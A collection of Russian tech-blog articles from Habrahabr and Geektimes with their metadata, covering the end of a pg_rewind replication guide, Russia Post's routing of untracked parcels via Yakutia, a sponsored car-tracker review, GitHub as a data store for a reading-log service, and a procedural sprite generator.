Копируем заранее сохранённый файл recovery.conf , который удаляется в результате работы pg_rewind .
Поднимаем базу, которая начнёт догонять убежавшего мастера, используя WAL-логи.
В таком варианте восстановление slave-базы происходит ощутимо дольше, но и опасностей использования btrfs нет. Спасибо за внимание. | https://habrahabr.ru/post/317660/ |
habrahabr | «Почта России» будет заворачивать все безтрекинговые посылки через Якутию — и это ещё не все странные новости | ['pochtoy.com', 'почта россии', 'бред', 'what the hell was that?'] | Позавчера на сайте «Почты России» появилась новость с оптимистичным заголовком «Доставка отправлений из зарубежных интернет-магазинов станет быстрее и удобнее». Что именно это означает, объяснять... | Позавчера на сайте «Почты России» появилась новость с оптимистичным заголовком « Доставка отправлений из зарубежных интернет-магазинов станет быстрее и удобнее ». Что именно это означает, объяснять пришлось « Коммерсанту », выяснившему, что с 1 января 2017 года все посылки из-за рубежа без трекинговых номеров будут идти через сортировочный центр в городе Мирный, Якутия. Нововведения «Почты России» вызывают вопросы даже у профессионалов рынка
Либо так, либо такие посылки нужно будет отправлять заказными мелкими пакетами, тарифы на которые выше в среднем на $0,5. Об этом «Почта России» уведомила все национальные почтовые службы стран, входящих во Всемирный почтовый союз. Национальные почтовые администрации 35 стран мира уже поддержали инициативу «Почты России» на Всемирном почтовом конгрессе в г. Стамбуле.
Больше всего от этой меры пострадают те, кто заказывают посылки частным образом из Китая: именно там чаще всего нет трекинговых номеров, но не только: standard shipping из Великобритании, например, тоже идут без трекинговых номеров. Впрочем, расположение места международного почтового обмена (ММПО) вполне прозрачно намекает, по-моему, на чей траффик «Почта» нацелилась в первую очередь.
Трудно не согласиться с экспертами «Коммерсанта», называющими нововведение запретительным — гонять все безтрекинговые посылки через медвежий угол вместо, например, той же Самары, которая является крупнейшим ж/д и авиаузлом, не слишком похоже на «оптимизацию логистической системы».
Впрочем, всё это делается во имя высшего блага: переход на полностью регистрируемые отправления должен повысить надёжность сервиса и скорость доставки. И стоимость , разумеется: Сегодня стоимость 100 гр. регистрируемого пакета составляет 87 руб., нерегистрируемого — 36. Таким образом, «Почта России» добивается, чтобы нерегистрируемый трафик стоил столько же, сколько и регистрируемый.
По крайней мере, если после 1 января ваша посылка без трекингового кода вновь потеряется — вы уже точно будете знать, где её искать: в городе Мирный, республика Саха (Якутия).
Не иначе как кто-то донёс Деду Морозу, что любители заказывать посылки из-за рубежа плохо вели себя в этом году. Как ещё объяснить, что плохие новости сыплются под новый год как из дырявого мешка очень плохого Санты? Почта России смотрит на тебя со всеми твоими посылками как на клиента
Честное слово, я давно не видел официальных заявлений, каждое утверждение которых настолько бы противоречило их смыслу. И ведь «более быстрые и удобные отправления» через Якутию — это ещё не всё. «Почта России» хочет странного
Про это уже «Коммерсант» не писал, так что мы с вами обсудим это первыми: ещё одна блестящая идея «Почти России» — потребовать, чтобы с 1 января 2017 г. все посылки предсортировались по регионам доставки в РФ еще в стране отправления. Это позволит полностью автоматизировать, ускорить процесс приемки, сортировки, прохождения отправлений по территории РФ и выдачи их получателям в почтовых отделениях.
И как это должно работать? Просто представьте аэропорт Нью-Йорка, в котором сидит таможня и на разные паллеты сортирует российские посылки, раскладывая их по десяткам областей. Это чисто технически нереально пока: по каким признакам они будут определять регион. По индексу? Вбивать и смотреть каждую посылку индивидуально для этого? Никто этим заниматься не будет. Да, теоретически можно как-то автоматизировать процесс, чтобы сканер выдавал цифру, присвоенную региону, клеилась наклейка с этой цифрой и т.д. — но в любом случае это дополнительные расходы, время и персонал для иностранных почтовых служб. Сомневаюсь, что это примут молча. Т.е. если такая сортировка и будет, то очень нескоро. — Елена Панова, VP Pochoty.com
Т.е. хитрый план «Почты России» заключается в том, чтобы свалить свою работу — сортировку посылок по городам — на иностранные почтовые службы. Зачем, если посылки всё равно полетят/поедуть/поплывут в несколько узловых городов, а оттуда уже по стране? Никто не станет слать письмо из Техаса сразу в Йошкар-Олу, а посылку из Гуанчжоу прямо в Элисту. Пока что это выглядит как сознательная провокация конфликта с почтовыми службами других государств, чтобы сделать их крайними — они же не выполняют требования.
Странным образом, это укладывается в логику последних инициатив, связанных с посылками: скажем, недавно опубликованная нашими коллегами схема по взиманию НДС с иностранных интернет-магазинов не просто не объясняет, как эта процедура должна происходить, а окончательно всё запутывает.
Впрочем, поскольку инициаторами хитрого плана и авторами схемы является печально известная «Ассоциация компаний интернет-торговли» (АКИТ), будет уместно предположить, что она и не должна работать. Это не глупость — а сознательно вредительство, палки в колёса трансграничной интернет-торговле в надежде, что она окончательно переломает себе ноги.
Так как именно «Почта России» собралась приучить почтовые службы всех стран мира разбираться в 85 регионах России? И что она будет делать, если они на это не пойдут?
Можно только предположить, что никак — и ничего. Не отправлять же их обратно с пометкой «укажите, пожалуйста, регион назначения, а то мы сами не знаем, где у нас Воронеж находится».
Но зачем вообще тогда анонсировать заведомо неисполнимые инициативы?
И зачем называть логистической оптимизацией отправку огромного потока посылок через город Мирный?
Очень хотелось бы услышать ответы на эти вопросы.
P.S. Все посылки Pochtoy.com из США имеют трекинговые номера, поэтому ваша покупка точно не поедет к вам через Якутию.
И по традиции, при первом заказе — скидка $5 по промо-коду supergeek . | https://geektimes.ru/company/pochtoy/blog/283712/ |
habrahabr | Как я испытывал автофон «Альфа-маяк» в Екатеринбурге | ['автосигнализация', 'автофон', 'альфа-маяк', 'D-маяк', 'on-line отслеживание автомобиля'] | Гаджетов для поиска авто после угона сейчас море. Собирал информацию, что лучше взять, и тут наткнулся на один сайт и мне на тест предложили интересное устройство, да еще и наш родной,... | Гаджетов для поиска авто после угона сейчас море. Собирал информацию, что лучше взять, и тут наткнулся на один сайт и мне на тест предложили интересное устройство, да еще и наш родной, импортозамещённый.
Можно:
• отслеживать свой маршрут, например при пешей прогулке в режиме турист;
• найти какой-то объект к которому заранее такой треккер прикреплен;
• отследить онлайн перемещение такого треккера удаленно.
Автофон Альфа-Маяк поисковый гаджет. Сценарии его использования применимы, больше к автомобилю, как самому ценному движимому имуществу. Хотя никто не мешает его вручить пожилому родственнику, там даже кнопка SOS есть.
На рынке есть несколько предложений, на любой вкус и кошелек. От домашних Bluetooth меток до дорогих GPS-логгеров в авто с подключением по CAN или OBD2 шине.
Ну самые дешевые с ценой в пару долларов или даже ниже это Bluetooth метки, их рассматривать не будем. Переходим сразу к более солидным устройствам – GSM Personal Locator.
Цена так невелика, а польза какая-то однобокая. Это так называемый GSM локатор определяющий координаты по базовым станциям, не более того. Работает он не так долго, батарейки жрёт как из пулемёта.
Аккумулятор тут встроенный, его емкость составляет всего 400 мА.ч., а время автономной работы всего около двух суток.
Далее идут устройства уже с полноценным GPS, одно время популярность подобным устройствам дал треккер TK-102B, который в последствии скопировали внешне почти все китайские производители поддельной электроники. Оригинальное устройство действительно полезно, но вот найти его достаточно
сложно в море подделок.
TK-102B уже использует данные с GPS и имеет на борту возможность размещения SIM карты и карты памяти. На устройство можно позвонить и прослушать обстановку благодаря встроенному микрофону или получить его координаты сделав запрос через SMS. TK-102B может проработать автономно от батареи четверо суток.
Продолжением удачной серии TK-102 стал солидный логгер для авто TK-103B.
Если предыдущие два типа треккеров-логгеров подходили для отслеживания объектов без внешнего питания, то TK-103B уже подходит, как правило только для автотранспорта с возможностью подключения к бортовой системе. И хотя он имеет встроенный аккумулятор, хватает его всего часов на 5 а дальше логгер выключается. Возможности его выглядят впечатляюще, в принципе для дешевых автомобилей он может заменить даже автосигнализацию, так как умеет управлять различными реле, например подкапотным или открытия дверей, а так же может разрывать цепь топливного насоса. К нему даже можно подключить камеру для фиксации нарушителя с отправлением фото на мобильный телефон владельца. TK-103B уже может работать не от одной а от двух SIM-карт выбирая ту которая лучше ловит. Но это не спасет от дешевых китайских глушилок GSM сигнала. А его основное уязвимое место это маленькая автономность. Плюс чтобы его подключить надо быть инженером. Подключается кучей проводов с выводом GSM и GPS антенн наружу из корпуса, значит его можно легко найти.
Ну и еще один тип трекеров – это так называемый бабушкофон.
Выглядит это устройство действительно как телефон с большими кнопками и, в принципе, выполняет те же функции. Но помимо основных есть еще и приятный бонус – возможность отследить местоположение объекта. Такие бабушкофоны могут быть от различных производителей LedStar, Concox, или просто GS-503, но в основе своей они все одинаковы. Такой треккер удобнее всего отдать пожилому родственнику, настроив отправку координат и вызов определенного номера телефона на тревожную кнопку.
В принципе выбрать есть из чего, а вот если бы было устройство которое все это объединяло, да еще и работало бы годами… И знаете, такое есть. Это как раз Автофон – наша отечественная разработка, которая присутствует на рынке с 1997-го года и постоянно совершенствуется.
А теперь немного теории про автоугоны. Угоняют автомобили и разбирают на запчасти, продавая Б/у запчасти. Номерных деталей-то в машине не много. А отследить можно только номер рамы/шасси, да двигателя. Остальное продавай безнаказанно, никто не отследит. Сейчас, у угонщиков, есть GSM глушилки. Включили такую, разбили окно, вытащили все что нашли и убежали. Сигналка даст знать о разбитии уже после того как все скрылись. Что уж говорить про автоугонщиков.
Так зачем же нужен автомаяк? Если его сигнал легко заглушить?
А тут все просто. При обнаружении пропажи автомобиля и выяснения, что его не утащили на штраф-стоянку, заявление попадает в ОВД, откуда поступает информация всем патрулям об угоне конкретного автомобиля и его, в принципе, начинают усердно отслеживать на дорогах. За короткий промежуток времени автоугонщики, отгоняют машину в так-называемый отстойник, который может находиться совсем недалеко. Как правило это тупики или дворы. Где автомобиль и отстаивается некоторое время, как правило в районе недели пока его не перестанут усердно искать, а именно чтоб убедиться что за машиной не приехали по маяку. Я встречал записи где автомобиль находили в таких отстойниках со снятыми клеммами с аккумулятора и отключенной электроникой, соответственно не все маяки, запитанные от штатной бортовой системы выйдут на связь. Заодно похитители могут поискать по проводам питания скрытые автологгеры, а так же сканером поля все излучающие объекты. И тут автофон раскрывает свой потенциал по максимуму. Большинство времени он находится в выключенном состоянии, а значит ничего не излучает, обнаружить его невозможно. По будильнику, в заданное время он просыпается и подключается к сетям сотовых операторов, посылая так называемые LBS координаты примерного местоположения. В среднем, время подключения к сети у автофона – секунд 30 если связь есть, когда со связью проблемы, время подключения может затянуться до нескольких минут. Таким образом глушилку после перемещения снимут и Автофон выйдет на связь. В базовом режиме именно Альфа-маяк работает только через интернет (GPRS включает при пробуждении). Соответственны команды с мобильно приложения или с личного кабинета на сайте приходят через сервер. По умолчанию номер симки владельцу даже не известен. Этот режим советуется и использовать. Возможно узнать номер симки и управлять через СМС, но для этого маяк надо «разлочить», снять галочку специальную в личном кабинете.
Кроме того это не просто логгер а полноценный сервис. Позвонив по номеру горячей линии и сообщив номер заявления в ОВД о краже автомобиля, операторы берут на себя всю работу по управлению и поиску маяка, а так же передают через официальные каналы данные с него в Полицию.
Итак Автофон Альфа-Маяк, что внутри коробочки:
В упаковке находится подробнейшая инструкция, само устройство, чехол позволяющий разместить устройство на ремне брюк или ошейнике животного и пластинка двухстороннего скотча 3М. Так же имеется карточка с данными авто маяка – логином и паролем доступа в личный кабинет.
Автофон Альфа-Маяк – это одна из новейших разработок в линейке авто маяков компании AutoSet. Она самая компактная и имеет базовые функции мониторинга. По факту это очень компактный мобильный телефон без экрана но с GPS и Глонасс на борту.
В режиме выхода на связь раз в сутки, на имеющихся батарейках авто маяк может проработать до 3-х лет. Значит его можно спрятать в достаточно укромное место с частичной разборкой, например обивки. При переводе в боевой режим с отправкой GPS координат раз в пол часа, Автофон Альфа-Маяк может проработать до 10-12 дней. А если перевести его в режим онлайн и следить в реальном времени за перемещением, то до 4х дней, но все зависит от температуры окружающего воздуха. Показатели просто великолепные. И все это на трех элементах типоразмера ААА.
Кстати сценарий использования Автофон Альфа-Маяк может применим не только к автомобилю. При помощи авто маяка можно отследить потерянного четвероногого друга или не дай бог, престарелого родственника. Кстати тут имеется и кнопка СОС, при нажатии на которую можно так же настроить несколько сценариев, от отправки точных геоданных, до включения авто маяка в режиме прослушки.
С чехлом из натуральной кожи, который имеется в комплекте Автофон можно прикрепить, например к ошейнику четвероногого друга или повесить на ремень, тем самым обеспечив находку ценного вам друга, предварительно конечно изменив настройки будильника на соответствующие, чтобы маяк выходил почаще на связь.
В устройстве уже стоит SIM модуль SIM800H с предоплаченным пакетом услуг, поэтому пополнять баланс карты не нужно.
SIM800H это миниатюрный четырехдиапазонный GSM/GPRS модуль в корпусе LGA размером всего 15,8 на 17,8 мм.
Подробнее про этот защищенный SIM модуль можно почитать вот тут: SIM800H
Модуль этот достаточно интересный а одной из основных особенностей модуля является рабочий температурный диапазон: -40 °C… +85 °C, тем самым он идеально подходит для круглосуточного нахождения в автомобиле. Кроме того вся электроника залита защитным лаком, что является дополнительной защитой от коррозии и замыкания от влаги.
Рассмотрим работу устройства подробнее:
Для начала работы необходимо пять раз быстро нажать на кнопку СОС, она отмечена стрелкой на маяке. Автофон Альфа-Маяк начнет мигать красным светодиодом. Дальше необходимо зайти в личный кабинет на сайте производителя Личный кабинет.
Как только вы зайдете под своей учетной записью в личный кабинет, устройство отправит свои LBS данные и отобразится на карте с примерными координатами.
Дальше в принципе настройка не требуется, но если кому-то нужны специфичные настройки по времени и типу передаваемых данных, то все это можно произвести в настройках. Отслеживать и настраивать автофон можно не только через браузер, но и через приложение для планшета или смартфона практически на любой мобильной платформе. Windows Phone на данный момент не поддерживается, но с этих телефонов запросто можно удобно управлять маяком через мобильную версию сайта.
При накоплении данных по местоположению можно отследить треки на карте, треки можно выводить в различных временных интервалах. Наиболее интересно они выглядят конечно в онлайн режиме. В обычном боевом режиме когда координаты отправляются раз в пол часа трек не так интересен, если авто не перемещается на дальние расстояния.
По различным настройкам программа дает конечно волю для разгулья, можно настраивать под любой свой сценарий. Имеются 2 будильника, которые будят устройство, на каждый можно задать интервал от минут до дней а так же что устройство будет делать когда проснется. Единственный минус – это отсутствие постоянной связи, поэтому любые настройки не находясь непосредственно рядом с маяком будут выполнены при выходе на связь. Если вы находитесь рядом с устройством, то достаточно нажать кнопку СОС чтобы пробудить его.
В принципе устройство достаточно интересное, я не утверждаю, что это панацея от угона, и всегда есть шанс, что оно может не помочь, но в автомобиле, оно скорее всего будет весьма полезно, тем более что сценарии его использования не ограничиваются только лишь авто тематикой.
Есть тут пара спорных моментов, на мой взгляд.
Первый – это батарея. Использование обычных батареек типа ААА, в принципе оправдано для различных температурных режимов. У меня дома внешний датчик температуры работает на двух ААА батарейках 2-3 года. А вот то что они запаяны и склеены между собой, может вызвать некоторые трудности при замене. Самому так, аккуратно, еще нужно постараться сделать, значит хочешь стабильности, бери такую сборку у производителя. С другой стороны данное решение (спаять батарейки) сделано производителем по определённой причине. Они провели испытания устройства с конкретными батарейками и именно с ними берут полную ответственность за всё что обещают. Боятся если люди поставят абы какие батарейки и маяк быстро сдохнет, что люди на них потом будут говорить что вот мол гады, а обещали 3 года и всё такое.
Второй момент это, то что на старых устройствах можно было заменить SIM карту на свою, а тут такой возможности нет. Номер четко прописан и принадлежит компании Автосет, а это не всем может понравиться. Хотя кто хочет использовать со своей симкой, купит другой маяк, их в линейке много. А тут, если устройство разлочить сняв галочку (писал об этом выше) в личном кабинете сразу становится доступен и номер и баланс. По умолчанию на балансе 48р. Этого достаточно на десятки лет работы устройства в базовом режиме. Пакеты GPRS крошечные. Сим-карта данного типа очень надежна, по спецификациям она даже умеет распознавать GSM глушение, правда тут нет выхода, чтобы передать информацию об этом по другим каналам. Но так же отсутствие контактов, как в обычном SIM ридере, не даст лишних хлопот.
Основные отличительные особенности этого маяка от других маяков Автофона да и впрочем от маяков других производителей – это размеры, заметно расширяющие список возможных мест для установки маяка, то есть его можно лучше спрятать и то что маяк (если он работает в базовом режиме, не разлочивается) полностью предоплачен на весь срок службы, не надо поэтому постоянно беспокоиться о балансе и пополнять его.
В общем решать тут каждому самому.
При своей цене Альфа-Маяк вполне функциональное и хорошо сделанное устройство. Сам автофон Альфа-Маяк можно приобрести тут . А если при заказе написать промокод GEEKT-AMAYAK2, то заветный даджет можно купить с 10%-й скидкой в течение 14 дней с момента публикации.
Не желаю никому оказаться в ситуации, когда Вашу машину угонят, и вы потеряете нервы, время и деньги. А вот такие гаджеты точно дают спокойный сон. Проверено на себе, беспокойство исчезнет.
Автор Огнёв Вячеслав, г. Екатеринбург Информация для блогеров и авторов:
Компания «Даджет» заинтересована в публикации независимых объективных обзоров даджетов в разного рода СМИ. Компания «Даджет» с радостью предоставит даджеты блогерам и авторам, желающим протестировать их и написать обзор.
Устройство после написания обзора остается у автора. Компания не пытается указывать автору, что именно писать о нашем товаре, но просит показать статью до публикации. В этом случае есть возможность уточнить информацию и предотвратить ошибки. Учитывать ли комментарии компании или нет, всегда остается на усмотрение автора. Подробнее... | https://geektimes.ru/company/dadget/blog/283624/ |
habrahabr | Использование Github в качестве хранилища пользовательских данных | ['git', 'github', 'api', 'хранение данных', 'markdown', 'книги', 'angular', 'yii', 'rest'] |
Выбирая сервис для хранения моих данных, важной составляющей является то, как долго такой сервис будет жить. От него нужно, чтобы я смог хотя бы прочитать сохраненные данные даже если энтузиазм... | Выбирая сервис для хранения моих данных, важной составляющей является то, как долго такой сервис будет жить. От него нужно, чтобы я смог хотя бы прочитать сохраненные данные даже если энтузиазм авторов проекта закончится вместе с деньгами для оплаты хостинга и базы данных. С таким подходом для своего проекта я искал сервисы баз данных, которые могли бы хранить пользовательские данные бесплатно. Многообещающим проектом был Parse.com, о котором я уже писал ранее в статье «Сайт без бекенда» . Но в январе 2016 мы узнали , что Parse.com проживет только один год и будет закрыт. В связи с этим я решил перевести хранение данных пользователей в git-репозиторий, который опубликован на Github. Схема работы сервиса Пользователь <=> GitHub Pages <=> Отдельный API на платном VDS <=> git-репозиторий на SSD на том же VDS <=> репозиторий на GitHub Существенным недостатком по вышеописанному критерию здесь является API на платном VDS, который однажды может стать недоступным навсегда. Но, благодаря всей цепочке, получить свои данные как в человеческом формате, так и в машиночитаемом можно будет на Github. Так как пользователь на Github Pages общается с API через javascript, то главная страница проекта будет по-прежнему доступна. В случае, если из звена нужно будет исключить Github по какой-либо причине, то можно перенести всю работу на другой хостинг репозиториев, например, Bitbucket. Почему бы не использовать систему pull-request'ов вместо API? Я нашел 3 причины: Пользователи должны быть знакомы с git и с системой PR на Github.
Нужно разрабатывать систему авторизации с проверкой, что пользователь в PR затронул только свои файлы.
Всё равно Нужен отдельный сервер, который будет пересобирать markdown файлы. Не отказываться же от них.
В результате, я пришел к выводу, что решения с кодом на своём сервере не избежать. Общение такой серверной части с Github происходит только через git. Использование ssh-ключа для выталкивания на Github делает процесс простым. Правомерность Подумав об структуре таких данных, я изучил вопрос легитимности использования Github с такой целью. Рассмотрим подробнее пункты Terms of Service , которые напрямую касаются вопроса. A. 2 You must be a human. Accounts registered by "bots" or other automated methods are not permitted. Аккаунт для выталкивания репозитория на Github нужно создать вручную (при этом на действующую электронную почту). A. 4 Your login may only be used by one person — i.e., a single login may not be shared by multiple people — except that a machine user's actions may be directed by multiple people. You may create separate logins for as many people as your plan allows. A. 7 One person or legal entity may not maintain more than one free account, and one machine user account that is used exclusively for performing automated tasks. Все действия по фиксации (commit) и выталкиванию (push) делаются от одного аккаунта. Но такие действия подходят под описание machine user , потому что они автоматизированы. G. 12 If your bandwidth usage significantly exceeds the average bandwidth usage (as determined solely by GitHub) of other GitHub customers, we reserve the right to immediately disable your account or throttle your file hosting until you can reduce your bandwidth consumption. В проекте используются текстовые файлы, а выталкивание происходит по расписанию в короткие промежутки времени. Практически, этот пункт не должен быть нарушен. Прочие рекомендации Github в некоторых материалах сообщает дополнительную информацию. We recommend repositories be kept under 1GB each. This limit is easy to stay within if large files are kept out of the repository. If your repository exceeds 1GB, you might receive a polite email from GitHub Support requesting that you reduce the size of the repository to bring it back down.
In addition, we place a strict limit of files exceeding 100 MB in size. Теоретически, эта часть может стать проблемой. За 2 года жизни сервиса учета прочитанных книг было сохранено около 8000 записей. При этом размер репозитория составляет около 7 МБ. Самый большой файл имеет размер около 500 КБ — это служебный файл с индексом записей. Учитывая, что в сервисе есть ограничения на длину передаваемых текстов, используя сервис по назначению, лимит будет превышен нескоро. В дальнейшем можно рассмотреть вариант шардирования. Там же Github нам сообщает, что они не проектировались (как и сам git) как средство хранения резервных копий или средство хранения больших sql-файлов. Мы не будем использовать Github как средство хранения sql-файлов, у нас другая структура данных. А так как данные предполагаются быть читаемыми на самом Github не только машинами, но и людьми, то назвать такую структуру чистой резервной копией тоже нельзя. Структура данных Создать функциональную, но при этом не избыточную структуру данных, которую можно было бы хранить в git-репозитории, можно только в рамках конкретного проекта. Наверное, можно было бы описать какой-то универсальный подход к проектированию этого аспекта, но я опишу конечный вариант, оставив только самое необходимое. Итак, для проекта Книгопись требуется хранить информацию о пользователе: id, псевдоним, дата последнего обновления и, главное, список прочитанных им книг. О прочитанной книге мы будем хранить: id, заголовок, автор, дата прочтения, примечания пользователя, дата последнего обновления. Задумка проекта в том, что пользователь указывает книгу свободным вводом, так, как ему это хочется. Это позволяет нам не использовать реестр всех существующих книг. Другими словами, каждая запись о книге имеет отношение только к пользователю, который её создал. В качестве формата данных выбран json за свою неизбыточность и хорошую совместимость с идей git-хранилища. Если хранить каждое значение json в отдельной строчке, это позволит получить наглядный diff на Github. Так как кроме пользователей и их книг нам пока ничего хранить не надо, мы создаем для каждого пользователя отдельную директорию с именем id пользователя. Внутри этой директории храним json-файл с базовой информацией о пользователе. Здесь же расположена директория books, и внутри неё хранятся отдельные json-файлы на каждую книгу с id книги в качестве имени файла. Рассмотрим вспомогательные файлы. Несмотря на то, что каждая запись о прочитанной книги имеет отношение к конкретному пользователю, для API потребовалось быстрое получение книги по её id. Я пошел по пути создания вспомогательного файла — индекса книг. Это csv-файл , который содержит id и полный путь к записи о книге. Создания такого файла можно было бы избежать, если делать поиск книг в контексте конкретного пользователя (тогда потребовалось бы дополнительное время на поиск файла в директории пользователя), либо делать составной id, часть которого имел бы id пользователя (избыточность и неатомарность id). Следующими вспомогательными файлами являются latest_books.json и latest_books_with_notes.json . Они хранят информацию о фиксированном количестве последних внесенных книгах, а также latest_users.json с фиксированным количеством последних зарегистрированных пользователей. Благодаря им, на сервисе можно показать последние добавленные книги с примечаниями и последних активных пользователей. Так как мы используем Github, то некоторую информацию мы можем отобразить в самом репозитории, используя markdown. Для этого будем пересобирать при каждом внесении новой информации файлы README.md и отдельно latest_books_with_notes.md на основе вышеописанных json-файлов. А главное, мы можем пересобирать сами страницы пользователей со списком прочитанного ими. Директории с пользователями мы сгруппировали по начальным символам id для избежания образования слишком большого количества объектов на одном уровне пути. Аутентификация и авторизация В отличии от Parse.com здесь нет возможности хранить пароли, но даже тогда я использовал uLogin для аутентификации, который объединяет десятки социальных сетей и сайтов, при этом не требует регистрации от пользователя. Работа с uLogin очень проста. Он передает токен доступа клиенту после успешного входа, этот токен нужно отправить на сервер, где сделать запрос к серверу uLogin для валидации токена и получения некоторой полезной информации, например, название сети-провайдера и id пользователя в ней. С помощью этой информации оказалось возможно привязать данные пользователя напрямую к его учетной записи в выбранной им социальной сети. Это означает, что в случае окончания работы uLogin, его можно будет заменить на аналогичный сервис (в том числе своим). Поэтому в качестве id пользователя я решил использовать комбинированный id вида id-provider, например, 83820536-yandex . Такой подход позволил избежать ограничения на хранение где-либо непубличных данных. Планируя сервис я предусмотрел сценарий утраты пользователем доступа к социальной сети. Такой сценарий реализовался недавно в связи с блокировкой в РФ LinkedIn. Пользователь обратился с просьбой о помощи. В проекте появилась функция «скопировать записи из другой учетной записи». Так как все данные общедоступны, то нет никакого вреда от того, что хоть кто может скопировать себе список хоть кого. Разумно добавить некоторые ограничения, чтобы пользователь «не прострелил себе ногу». В итоге, пользователь воспользовался функцией копирования и получил доступ к своим записям, хотя и входит на сервис теперь через VK. Теперь к вопросу авторизации пользователя при работе с API. На первых этапах разработки, я создавал случайный токен доступа, к которому привязывал пользовательский id после аутентификации (сама связь хранилась в кеше приложения), а токен возвращал клиенту. Предполагалось, что он должен будет включать его в каждый запрос к API. Но в дальнейшем я присмотрелся к привычному механизму сессий и кук (cookies). У cookies оказались неплохие преимущества. Во-первых, можно установить HttpOnly. Не сказать, что это преимущество исключило все XSS-атаки, но хотя бы на один сценарий стало меньше. Во-вторых, куки передаются автоматически, если клиент на js в браузере, а это как раз наш случай. Много какой фреймворк для серверной части позволяет очень легко реализовать механизм «запомнить меня» с помощью долгоживущей куки. По ней он поднимает сессию пользователя. Дальнейшая процедура авторизации делается в рамках фреймворка. Нужно, конечно, определить сущности и механизмы сохранения данных в файловую систему , но это сильно зависит от структуры данных. Скажу лишь, что нужно предусмотреть подобие транзакций для git-фиксаций. Это позволит объединить изменение нескольких сущностей в один коммит. Преимущества Бесплатно
История всех изменений
Готовая система отката изменений
Возможность быстро получить полную копию всех данных
Можно получить фрагменты данных в обход API, используя raw-данные GitHub
Предположительно, долговечность
Недостатки Скорость чтения и записи . Хотя использование SSD на хостинге скрашивает ситуацию. Рекомендую ssd-хостинг DigitalOcean: реф. ссылка с бонусами. Могут возникнуть сложности с масштабированием . Выталкивание и вытягивание не слишком быстрые операции, чтобы синхронизировать хранилище в реальном времени. Возможно, поможет шардинг по пользователям. Вопрос поисковой оптимизации открыт. Проект на Github Pages + Angular, поисковые системы такое не видят. Возможно, markdown файлы попадут в индекс, либо будут проиндексированы страницы в социальных сетях, куда происходит экспорт записей. Реализация поиска требует дополнительных усилий. Поддержка локализации для markdown-страниц на Github отсутствует. Может помочь дублирование данных, но это не так красиво. Нет привычных языков запроса . Получение и запись нужно реализовывать самостоятельно на довольно низком уровне. Вывод Проект с использованием Github в качестве хранилища данных удалось проверить временем. На дату публикации статьи он работает больше 3 месяцев. Возможно, всё не развалилось, потому что не было серьезных нагрузок или ушлых ребят. А возможно, идея жизнеспособна, хотя бы, для небольших проектов. Если вы еще не знаете, где можно сохранить список прочитанных книг, но хотите составить по нему отчет за прошедший год, то добро пожаловать. Исходные коды всех частей проекта: API для общения пользователей с хранилищем (копия с bitbucket, потому один коммит)
Сайт-клиент
Хранилище данных
| https://habrahabr.ru/post/317662/ |
habrahabr | Gen Jam 2016: процедурно генерируемые спрайты | ['процедурная генерация', 'game jam', 'генерация спрайтов', 'спрайты'] | GenJam 2016
19 ноября 2016 года в Сан-Франциско прошёл первый ежегодный Gen Jam (геймджем по процедурной генерации). Идея была в том, чтобы за субботу создать генератор графики, «объект,... | GenJam 2016
19 ноября 2016 года в Сан-Франциско прошёл первый ежегодный Gen Jam (геймджем по процедурной генерации). Идея была в том, чтобы за субботу создать генератор графики, «объект, создающий объекты», если вам угодно.
Я создал программу, рисующую спрайты персонажей в удивительном стиле набора 16-битных спрайтов Кристофера «Oryx» Барретта из Oryx Design Lab. Посмотрите на примеры того, что делает программа: Основной план
В сущности, я взял спрайты персонажей, разбил их на части, нормализовал цветовую палитру и реализовал алгоритм их сборки для создания новых уникальных спрайтов.
Итак, я разбил исходные спрайты на части — шлемы, волосы, тела, ноги, оружие и т.д. Потом я случайным образом выбирал их и собирал вместе. Затем я менял цвета. Вот основная идея: Входные данные
Исходные спрайты из набора 16-битных спрайтов, которые я использовал в качестве основы, выглядят вот так (исходный набор спрайтов ОГРОМЕН, вот всего 5 примеров из него):
Спрайты были разбиты на восемь групп: тело, голова, шлем, щит, ноги, волосы, холодное оружие и лук. Затем я использовал Photoshop, чтобы вырезать куски и поместить их в отдельные файлы:
Задумка была в том, чтобы получить наборы разных голов, разного оружия, щитов и т.д., а затем комбинировать их случайным образом. Палитра
Я хотел варьировать цвета, чтобы они соответствовали исходным, входящим в цветовую палитру, но в то же время создавали большую вариативность. Хитрость в том, чтобы узнать, какие цвета использовались в разных спрайтах, сгруппировать их вместе как линейный градиент и выбирать цветовые градиенты для случайной смены цветов фрагментов спрайтов.
Другими словами, я прошёл по всем файлам и собрал все цвета, использованные для оттенков кожи, все оттенки зелёного, синего и т.д. для одежды, все цвета металла и прочего, а потом поместил их в файл палитры. Набор линейных градиентов выглядит следующим образом: Каждый из рядов, кроме первого — это линейный градиент. Один градиент выбирается случайно. Первый ряд — это входные цвета. Когда алгоритм видит один из этих цветов, он заменяет его цветом в той же колонке из выбранного линейного градиента.
Потом я взял сами спрайты и перекрасил их, чтобы использовать «входные цвета», которые можно заменить цветами из линейного градиента. Например, если у меня были 3 рубахи синего, зелёного и красного цветов, я мог сделать их все красными, добавить линейные градиенты для синего, зелёного и красного в файл палитры и заставить алгоритм заменить красные цветами из случайно выбранного линейного градиента.
Вот примеры результатов: Материалы
Материалы — это отрисовываемые вещества, такие как одежда, выделанная кожа, металл, тело, драгоценные камни и т.д. Мне нужны были разные цветовые градиенты для разных материалов, потому что только определённые цвета выглядели естественными для конкретных типов материалов. Например, цвета, выглядящие хорошо для металла, не подходят для оттенков кожи, и наоборот.
Кроме того, вариации между цветами в градиенте для разных материалов различаются. Например, градиенты металла очень сильно варьируются от светлого до тёмного в пределах одного градиента, а одежда различается не так сильно.
Получившаяся палитра содержала наборы линейных цветовых градиентов для следующих материалов: базовая одежда, дополнительная одежда, волосы, кожа персонажа, металл, дерево, выделанная кожа, драгоценные камни и тёмный акцентный цвет.
Вот окончательная палитра: Группировка объектов
Группировка — это получение набора входных данных и объявление некоторых из них сочетающимися, а других — несочетаемыми. Например, могут быть группы спрайтов «спрайты мага» и «спрайты воина» для разных наций, нарисованных в разных эстетических стилях, группы хороших и плохих персонажей, богатых и бедных, и т.д. В результате получается множество вариантов генерации спрайтов согласно выбранному вами эстетическому подходу. Процесс в целом
Если вкратце, то я сделал следующее: Разбил большую коллекцию спрайтов на части: оружие, головы, тела и т.д.
Изменил входные цвета на «стандартные» цвета материалов (5 оттенков одежды, 5 оттенков металла, 4 оттенка кожи и т.д.).
Написал алгоритм выбора одной части из каждого набора и отрисовки их одной поверх другой.
Написал алгоритм смены «стандартных» цветов на один из нескольких наборов цветов (называющихся «линейными градиентами») из палитры.
Вот и всё! Так получились тысячи уникальных и интересных спрайтов. Github, заключение и благодарности
